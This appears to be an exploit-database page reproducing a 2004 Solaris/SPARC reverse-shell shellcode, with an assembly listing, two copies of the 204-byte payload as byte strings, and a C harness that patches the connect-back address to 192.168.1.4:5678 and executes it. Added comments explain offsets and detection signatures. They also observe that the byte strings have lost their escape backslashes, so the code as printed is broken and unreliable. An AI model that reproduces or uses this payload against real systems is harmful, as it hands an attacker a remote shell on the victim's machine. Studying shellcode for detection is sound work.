Solaris/SPARC – Reverse (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)


漏洞ID 1054637 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
漏洞平台 Solaris_SPARC CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13496
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * Solaris shellcode - connects /bin/sh to a host
 *
 * Claes M. Nyberg 20020624
 * <[email protected]>, <[email protected]>
 */

#include <string.h>

/***********************************************************
void
main(void)
{

__asm__("
       
        ! Create socket
        mov    0x2, %o0         ! o0 = AF_INET
        mov    0x2, %o1         ! o1 = SOCK_STREAM
        xor    %o2, %o2, %o2    ! o2 = 0
        mov    0xe6, %g1        ! g1 = 230 = SYS_so_socket
        ta     8                ! socket(AF_INET, SOCK_STREAM, 0);
        add    %o0, 0x1, %l0    ! l0 = socket_fd +1 

        ! Server address
        mov    0xc0, %l1        ! 192
        sll    %l1, 0x8, %l1    ! 192.0
        or     0xa8, %l1, %l1   ! 192.168
        sll    %l1, 0x8, %l1    ! 192.168.0
        or     0x1, %l1, %l1    ! 192.168.1
        sll    %l1, 0x8, %l1    ! 192.168.1.0
        or     0x1, %l1, %l1    ! 192.168.1.1
        st     %l1, [%sp - 12]  ! Server IP 
        mov    0x2, %l1         ! AF_INET
        sth    %l1, [%sp -16]   ! Server family
        mov    0x30, %l1        ! High order byte of Port
        sll    %l1, 0x8, %l1    ! << 
        or     0x39, %l1, %l1   ! Low order byte of port
        sth    %l1, [%sp - 14]  ! Server port

        ! Connect
        sub    %sp, 16, %o1     ! o1 = &server
        mov    0x10, %o2        ! o2 = 16 = sizeof(struct sockaddr_in)
        mov    0xeb, %g1        ! g1 = 235 = SYS_connect
        ta     8                ! connect(socket_fd, &server, 16);

        ! Set up IO              
        sub    %l0, 0x1, %o0    ! o0 = socket_fd
        mov    0x9, %o1         ! o1 = F_DUP2FD
        xor    %o2, %o2, %o2    ! o2 = 0 = STDIN_FILENO
        mov    0x3e, %g1        ! g1 = 62 = SYS_fcntl
        ta     8                ! fcntl(socket_fd, F_DUP2FD, STDIN_FILENO);
        sub    %l0, 0x1, %o0    ! o0 = socket_fd
        mov    0x1, %o2         ! o2 = 1 = STDOUT_FILENO
        ta     8                ! fcntl(socket_fd, F_DUP2FD, STDOUT_FILENO);
        sub    %l0, 0x1, %o0    ! o0 = socket_fd
        mov    0x2, %o2         ! o2 = 2 = STDERR_FILENO
        ta     8                ! fcntl(socket_fd, F_DUP2FD, STDERR_FILENO);
        
        ! Execve /bin/sh
        xor    %o2, %o2, %o2    ! o2 = 0 => envp = NULL
        set    0x2f62696e, %l0  ! l0 = '/bin'
        set    0x2f2f7368, %l1  ! l1 = '//sh'    
        st     %o2, [%sp - 4]   ! String ends with NULL 
        st     %l1, [%sp - 8]   ! Write //sh to stack
        st     %l0, [%sp - 12]  ! Write /bin to stack
        sub    %sp, 12, %o0     ! o0 = &string
        st     %o2, [%sp - 16]  ! argv[1] = NULL
        st     %o0, [%sp - 20]  ! argv[0] = &string
        sub    %sp, 20, %o1     ! o1 = argv (points at argv[0] stored at [%sp - 20])
        mov    0x3b, %g1        ! g1 = 59 = SYS_execve
        ta     8                ! execve(argv[0], argv, NULL);

        ! Exit 
        mov    1, %g1           ! g1 = 1 = SYS_exit
        ta     8                ! exit();
    ");
}
***********************************************************/

/* Index of low order byte in IP address */
/*
 * Byte offsets into _solaris_code of the immediate operand (the last byte
 * of each 4-byte SPARC instruction) in the mov/or sequence that assembles
 * the destination address in %l1: offset 27 is the "mov 192" (IP3), 35 the
 * "or 168" (IP2), 43 the first "or 1" (IP1) and 51 the second "or 1" (IP0).
 * main() rewrites these four bytes to re-target the connect-back address
 * without reassembling the code, so they are also where an analyst should
 * expect a variant of this payload to differ.
 */
#define IP0       51    
#define IP1       43
#define IP2       35
#define IP3       27

/* Index of low order byte in port */
/*
 * Same idea for the two-instruction port build: offset 67 is the immediate
 * of "mov 0x30" (high byte, P1) and 75 the immediate of "or 0x39" (low
 * byte, P0).  The unpatched string therefore encodes port 0x3039 = 12345.
 */
#define P0        75    
#define P1        67  

static char solaris_code[] =
    /*
     * Annotated copy of the 204-byte payload from the asm listing above:
     * 51 SPARC instructions, 4 bytes each, one instruction per string
     * fragment.  Not referenced by main(), which patches and runs
     * _solaris_code below instead.  For analysis/detection the structure is:
     * every system call is "mov N, %g1" followed by the trap "ta 8"
     * (91 d0 20 08), with N = 230 so_socket, 235 connect, 62 fcntl
     * (F_DUP2FD = 9 onto fds 0, 1, 2), 59 execve and 1 exit; the program
     * path is "/bin//sh" padded to two 4-byte words.  In this copy the "\"
     * of each "\xNN" escape appears to have been lost, so the fragments
     * read as literal text rather than bytes.
     */
    
    /* Create socket */
    "x90x10x20x02"   /* mov     2, %o0               */
    "x92x10x20x02"   /* mov     2, %o1               */
    "x94x1ax80x0a"   /* xor     %o2, %o2, %o2        */
    "x82x10x20xe6"   /* mov     230, %g1             */
    "x91xd0x20x08"   /* ta      0x8                  */
    "xa0x02x20x01"   /* add     %o0, 1, %l0          */

    /* Server address */
    "xa2x10x20xc0"   /* mov     192, %l1             */
    "xa3x2cx60x08"   /* sll     %l1, 8, %l1          */
    "xa2x14x60xa8"   /* or      %l1, 168, %l1        */
    "xa3x2cx60x08"   /* sll     %l1, 8, %l1          */
    "xa2x14x60x01"   /* or      %l1, 1, %l1          */
    "xa3x2cx60x08"   /* sll     %l1, 8, %l1          */
    "xa2x14x60x01"   /* or      %l1, 1, %l1          */
    "xe2x23xbfxf4"   /* st      %l1, [%sp - 12]      */
    "xa2x10x20x02"   /* mov     2, %l1               */
    "xe2x33xbfxf0"   /* sth     %l1, [%sp - 16]      */
    "xa2x10x20x30"   /* mov     48, %l1              */
    "xa3x2cx60x08"   /* sll     %l1, 8, %l1          */
    "xa2x14x60x39"   /* or      %l1, 57, %l1         */
    "xe2x33xbfxf2"   /* sth     %l1, [%sp - 14]      */

    /* Connect */
    "x92x23xa0x10"   /* sub     %sp, 16, %o1         */
    "x94x10x20x10"   /* mov     16, %o2              */
    "x82x10x20xeb"   /* mov     235, %g1             */
    "x91xd0x20x08"   /* ta      0x8                  */

    /* Set up IO: dup the socket onto stdin/stdout/stderr via fcntl(F_DUP2FD) */
    "x90x24x20x01"   /* sub     %l0, 1, %o0          */
    "x92x10x20x09"   /* mov     9, %o1               */
    "x94x1ax80x0a"   /* xor     %o2, %o2, %o2        */
    "x82x10x20x3e"   /* mov     62, %g1              */
    "x91xd0x20x08"   /* ta      0x8                  */
    "x90x24x20x01"   /* sub     %l0, 1, %o0          */
    "x94x10x20x01"   /* mov     1, %o2               */
    "x91xd0x20x08"   /* ta      0x8                  */
    "x90x24x20x01"   /* sub     %l0, 1, %o0          */
    "x94x10x20x02"   /* mov     2, %o2               */
    "x91xd0x20x08"   /* ta      0x8                  */

    /* Execve /bin/sh */
    "x94x1ax80x0a"   /* xor     %o2, %o2, %o2        */
    "x21x0bxd8x9a"   /* sethi   %hi(0x2f626800), %l0 */
    "xa0x14x21x6e"   /* or      %l0, 0x16e, %l0      */
    "x23x0bxcbxdc"   /* sethi   %hi(0x2f2f7000), %l1 */
    "xa2x14x63x68"   /* or      %l1, 0x368, %l1      */
    "xd4x23xbfxfc"   /* st      %o2, [%sp - 4]       */
    "xe2x23xbfxf8"   /* st      %l1, [%sp - 8]       */
    "xe0x23xbfxf4"   /* st      %l0, [%sp - 12]      */
    "x90x23xa0x0c"   /* sub     %sp, 12, %o0         */
    "xd4x23xbfxf0"   /* st      %o2, [%sp - 16]      */
    "xd0x23xbfxec"   /* st      %o0, [%sp - 20]      */
    "x92x23xa0x14"   /* sub     %sp, 20, %o1         */
    "x82x10x20x3b"   /* mov     59, %g1              */
    "x91xd0x20x08"   /* ta      0x8                  */

    /* Exit */
    "x82x10x20x01"   /* mov     1, %g1               */
    "x91xd0x20x08";  /* ta      0x8                  */


static char _solaris_code[] =
    /*
     * The same 204 bytes as solaris_code, packed 16 per line without the
     * per-instruction comments.  This is the buffer main() patches (IP0..IP3,
     * P0/P1) and then jumps into.  None of the fragments is 00, which is the
     * only reason main() can measure the payload with strlen().  As in the
     * annotated copy, the "\" of each "\xNN" escape appears to be missing in
     * this rendering, so as written this is a string of ASCII text rather
     * than machine code.
     */
    "x90x10x20x02x92x10x20x02x94x1ax80x0ax82x10x20xe6"
    "x91xd0x20x08xa0x02x20x01xa2x10x20xc0xa3x2cx60x08"
    "xa2x14x60xa8xa3x2cx60x08xa2x14x60x01xa3x2cx60x08"
    "xa2x14x60x01xe2x23xbfxf4xa2x10x20x02xe2x33xbfxf0"
    "xa2x10x20x30xa3x2cx60x08xa2x14x60x39xe2x33xbfxf2"
    "x92x23xa0x10x94x10x20x10x82x10x20xebx91xd0x20x08"
    "x90x24x20x01x92x10x20x09x94x1ax80x0ax82x10x20x3e"
    "x91xd0x20x08x90x24x20x01x94x10x20x01x91xd0x20x08"
    "x90x24x20x01x94x10x20x02x91xd0x20x08x94x1ax80x0a"
    "x21x0bxd8x9axa0x14x21x6ex23x0bxcbxdcxa2x14x63x68"
    "xd4x23xbfxfcxe2x23xbfxf8xe0x23xbfxf4x90x23xa0x0c"
    "xd4x23xbfxf0xd0x23xbfxecx92x23xa0x14x82x10x20x3b"
    "x91xd0x20x08x82x10x20x01x91xd0x20x08";

int
main(void)
{
    /*
     * Test harness for the payload: rewrites the connect-back address and
     * port inside _solaris_code and then executes the buffer as code.  It
     * therefore runs the shellcode on the host it is compiled on; the
     * listing is reproduced here for analysis of the payload's structure.
     */
    void (*code)() = (void *)_solaris_code;
    
    /*
     * IP0..IP3 are the immediate bytes of the four instructions that build
     * the address in %l1 (see the asm listing above), written last octet
     * first: 192.168.1.1 in the original string becomes 192.168.1.4.
     */
    _solaris_code[IP0] = 4;
    _solaris_code[IP1] = 1;
    _solaris_code[IP2] = 168;
    _solaris_code[IP3] = 192;

    /* P1/P0 are the high/low bytes of the port immediate: 0x162e = 5678. */
    _solaris_code[P0] = 0x2e;
    _solaris_code[P1] = 0x16;

    /*
     * NOTE(review): strlen() returns size_t but is printed with %d, which is
     * a format/argument mismatch, and the format string has no newline (in
     * this copy "\n" appears as a bare "n", consistent with the "\x" escapes
     * above having lost their backslash).  printf() also needs <stdio.h>,
     * which this file does not include.  strlen() is only usable because
     * the 204 bytes contain no 0x00.
     */
    printf("Shellcode length: %dn", strlen(_solaris_code));

	/* Connect to 192.168.1.4:5678 */
    /* The payload ends in execve and then exit, so control is not expected
     * to come back to this frame; the return below is reached only if the
     * jump fails to run the code. */
    code();
    return(1);
}    

// milw0rm.com [2004-09-26]
